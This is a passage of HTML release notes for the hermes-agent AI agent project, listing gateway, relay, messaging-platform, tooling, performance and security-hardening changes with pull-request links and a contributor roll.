data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Honor <code>NOUS_INFERENCE_BASE_URL</code> env override for Nous OAuth; keep Nous auth fresh for idle dashboard/gateway agents (<a href="https://github.com/NousResearch/hermes-agent/pull/52270" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52270/hovercard">#52270</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50567" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50567/hovercard">#50567</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🌐 Gateway, Fleet &amp; Relay</h2>
<h3>Scale-to-zero &amp; drain</h3>
<ul>
<li><strong>Scale-to-zero idle detection + dormant-quiesce (Phase 0)</strong>; hardened dormancy guards; fixed arm-gate counting disabled placeholder platforms (<a href="https://github.com/NousResearch/hermes-agent/pull/52243" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52243/hovercard">#52243</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52359" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52359/hovercard">#52359</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52831" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52831/hovercard">#52831</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li><strong>External drain coordination (safe-shutdown Phase 2)</strong>; suppress home-channel shutdown broadcast on flagged drains; persist in-flight transcript on restart/shutdown drain timeout; busy/idle readout for safe lifecycle actions (<a href="https://github.com/NousResearch/hermes-agent/pull/52937" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52937/hovercard">#52937</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54824" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54824/hovercard">#54824</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50312" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50312/hovercard">#50312</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50131" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50131/hovercard">#50131</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Default <code>restart_drain_timeout</code> to 0 to kill a systemd crash loop; self-heal a gateway stranded in draining/degraded (<a href="https://github.com/NousResearch/hermes-agent/pull/54066" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54066/hovercard">#54066</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55397" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55397/hovercard">#55397</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Relay (Phase 5 / 6)</h3>
<ul>
<li>Wake primitive (gateway side); going-idle / buffered-flip primitive; <code>passthrough_forward</code> over WS; multi-platform-per-agent identity + per-frame egress; forward stable instance id at self-provision; declare relevance policy to the connector (<a href="https://github.com/NousResearch/hermes-agent/pull/51595" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51595/hovercard">#51595</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51572" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51572/hovercard">#51572</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50702" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50702/hovercard">#50702</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52830" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52830/hovercard">#52830</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50772" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50772/hovercard">#50772</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51248" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51248/hovercard">#51248</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li>Authorize relay-delivered events by delivery, not <code>source.platform</code>; adopt <code>scope_id</code> wire key; purge platform-specific scope terminology (<a href="https://github.com/NousResearch/hermes-agent/pull/52306" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52306/hovercard">#52306</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55289" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55289/hovercard">#55289</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56016" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56016/hovercard">#56016</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
</ul>
<h3>Gateway core &amp; rendering</h3>
<ul>
<li>Typed send-error classification (<code>SendResult.error_kind</code>); per-platform <code>typing_indicator</code> toggle; per-category context breakdown in <code>/usage</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/50342" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50342/hovercard">#50342</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55394" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55394/hovercard">#55394</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/55204" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55204/hovercard">#55204</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>API server: configurable concurrent-run cap to prevent DoS; scope run approvals by run id (<a href="https://github.com/NousResearch/hermes-agent/pull/50007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50007/hovercard">#50007</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56129" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56129/hovercard">#56129</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>📱 Messaging Platforms</h2>
<ul>
<li><strong>Cron continuations</strong> — continuable cron jobs (thread-preferred continuation with DM-mirror fallback); flat in-channel continuable cron delivery for Slack; warn when gateway not running on cron create/list (<a href="https://github.com/NousResearch/hermes-agent/pull/52250" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52250/hovercard">#52250</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56254" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56254/hovercard">#56254</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51696" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51696/hovercard">#51696</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Telegram: configurable command menu + raised default cap so skills stay visible; gate rich draft previews separately; drain general send pool on pool timeout before retry (<a href="https://github.com/NousResearch/hermes-agent/pull/51716" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51716/hovercard">#51716</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52088" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52088/hovercard">#52088</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54121" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54121/hovercard">#54121</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>)</li>
<li>Slack: opt-in Block Kit rendering for agent messages; <code>--no-assistant</code> flag for manifest generation (<a href="https://github.com/NousResearch/hermes-agent/pull/56102" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56102/hovercard">#56102</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51487" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51487/hovercard">#51487</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Discord: render reasoning as <code>-#</code> subtext via <code>display.reasoning_style</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/51168" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51168/hovercard">#51168</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Native WhatsApp media delivery via the Baileys bridge; Teams native <code>send_video</code>/<code>send_voice</code>/<code>send_document</code>; photon sidecar upgraded to spectrum-ts v8 with tapback correlation; Raft gateway setup wizard (<a href="https://github.com/NousResearch/hermes-agent/pull/53598" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53598/hovercard">#53598</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49308" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49308/hovercard">#49308</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53451" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53451/hovercard">#53451</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56230" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56230/hovercard">#56230</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Signal: AAC voice-note remux + shared markdown formatting (<a href="https://github.com/NousResearch/hermes-agent/pull/49530" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49530/hovercard">#49530</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Migrate slack/dingtalk/whatsapp/matrix/feishu/telegram/wecom/email/sms adapters to bundled (<a href="https://github.com/NousResearch/hermes-agent/pull/49408" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49408/hovercard">#49408</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🔧 Tool System, Skills &amp; MCP</h2>
<ul>
<li>Blank Slate setup mode — minimal agent, opt in to everything (<a href="https://github.com/NousResearch/hermes-agent/pull/36733" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36733/hovercard">#36733</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>MCP: config persistence attack surface hardened; block base_url exfil; keepalive for short-TTL sessions (see Security) — plus catalog &amp; UX carried from v0.17.0</li>
<li>Skills: <code>/learn</code> distillation (see Self-Improvement); <code>cloudflare-temporary-deploy</code> optional skill; creative-ideation v2.1.0 method library (<a href="https://github.com/NousResearch/hermes-agent/pull/50849" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50849/hovercard">#50849</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42402" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42402/hovercard">#42402</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>)</li>
<li>Kanban: task lifecycle plugin hooks (claimed/completed/blocked); typed block reasons + unblock-loop breaker; handoff freshness stamping (<a href="https://github.com/NousResearch/hermes-agent/pull/50349" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50349/hovercard">#50349</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52848" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52848/hovercard">#52848</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53973" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53973/hovercard">#53973</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Plugins: <code>ctx.profile_name</code> for session-agnostic profile access (<a href="https://github.com/NousResearch/hermes-agent/pull/50346" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50346/hovercard">#50346</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>LSP: PowerShellEditorServices language server; mem0 v3 API + OSS mode + update/delete tools (<a href="https://github.com/NousResearch/hermes-agent/pull/55930" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/55930/hovercard">#55930</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/15624" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15624/hovercard">#15624</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kartik-mem0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kartik-mem0">@kartik-mem0</a>)</li>
</ul>
<h2>⚡ Performance</h2>
<ul>
<li>Cold start: lazy-load gateway platform adapters; parse config + plugin manifests with libyaml <code>CSafeLoader</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/54448" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54448/hovercard">#54448</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54486" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54486/hovercard">#54486</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>State: merge FTS5 segments + <code>handoff_state</code> index to curb write-lock contention; single-pass <code>list_profiles</code> alias map + skill-count cache + event-loop offload (<a href="https://github.com/NousResearch/hermes-agent/pull/54752" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54752/hovercard">#54752</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54770" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54770/hovercard">#54770</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🔒 Security &amp; Reliability</h2>
<ul>
<li>Harden MCP-config persistence attack surface; block cron <code>base_url</code> overrides that exfiltrate provider credentials; non-reusable sentinel for prefix secrets in file reads (<a href="https://github.com/NousResearch/hermes-agent/pull/50476" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50476/hovercard">#50476</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56196" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56196/hovercard">#56196</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54166" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54166/hovercard">#54166</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Redact Slack App-Level (<code>xapp-</code>) tokens; browser cloud-metadata floor on all backends (CDP non-local); re-check private-network guard after <code>browser_back</code> navigation; scope <code>/resume</code> and <code>/sessions</code> to caller origin (IDOR); <code>aiohttp</code> 3.14.1 CVE floor across lazy messaging paths + pin-drift guard (<a href="https://github.com/NousResearch/hermes-agent/pull/56227" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56227/hovercard">#56227</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52349" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52349/hovercard">#52349</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56526" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56526/hovercard">#56526</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56378" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56378/hovercard">#56378</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56237" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56237/hovercard">#56237</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claudlos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claudlos">@claudlos</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Cron reliability wave: fail closed when an unpinned job's provider drifts; run missed-grace jobs once instead of deferring forever; keep the ticker alive on <code>BaseException</code> + heartbeat-aware status; layer enabled MCP servers onto per-job toolsets; guard cron model-tool path + auto-resume loop breaker (<a href="https://github.com/NousResearch/hermes-agent/pull/51051" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51051/hovercard">#51051</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50062" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50062/hovercard">#50062</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50016" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50016/hovercard">#50016</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50117" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50117/hovercard">#50117</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56240" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56240/hovercard">#56240</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Windows: suppress console flashes + harden gateway restarts; prefer cmd npm shim on PATH fallback; respawn gateway windowless after GUI update; prefer managed node for whatsapp/desktop (<a href="https://github.com/NousResearch/hermes-agent/pull/52340" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52340/hovercard">#52340</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/50398" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50398/hovercard">#50398</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/52239" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/52239/hovercard">#52239</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🔁 Reverts (in-window, for the record)</h2>
<ul>
<li>cron job storage returned to per-profile (reverts <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4517607524" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/32117" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32117/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/32117">#32117</a> + <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4719892950" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/50993" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/50993/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/50993">#50993</a>); don't clone <code>auth.json</code> (duplicating OAuth grant causes sibling revocation); windows terminal-popup PRs rolled back; <code>prompt_caching.enabled</code> toggle backed out for re-evaluation (<a href="https://github.com/NousResearch/hermes-agent/pull/51116" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51116/hovercard">#51116</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/51732" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51732/hovercard">#51732</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/53853" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/53853/hovercard">#53853</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56126" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56126/hovercard">#56126</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>👥 Contributors</h2>
<p><strong>381 people</strong> contributed to this release (via commits, co-author trailers, and salvaged PRs). Thank you, all of you.</p>
<h3>Core</h3>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a> — release lead; MoA first-class, verification/goals, <code>/learn</code>, background review, security round, providers, the P0/P1 clean-sweep</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a> — desktop app (projects, memory graph, <code>/journey</code>, multi-terminal, composer refactor wave, pets, verification UX)</li>
</ul>
<h3>Top community contributors</h3>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a> — the P0/P1 backlog burn: cron reliability wave, state perf, security (cron credential-exfil), gateway/signal, TUI config — a huge share of the priority closures</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a> — relay Phase 5/6, scale-to-zero / drain coordination, dashboard auth/keys, gateway hardening</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a> — CI/docker (unified jobs, faster builds, timings report)</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a> — Windows hardening (console flashes, npm shim, gateway restarts)</li>
</ul>
<h3>All contributors</h3>
<p><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xbyt4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xbyt4">@0xbyt4</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xDevNinja/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xDevNinja">@0xDevNinja</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xsir0000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xsir0000">@0xsir0000</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1RB/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1RB">@1RB</a>, @595650661, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aaronlab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aaronlab">@aaronlab</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abchiaravalle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abchiaravalle">@abchiaravalle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adammatski1972/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adammatski1972">@adammatski1972</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/AetherAgents/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AetherAgents">@AetherAgents</a>,<br>
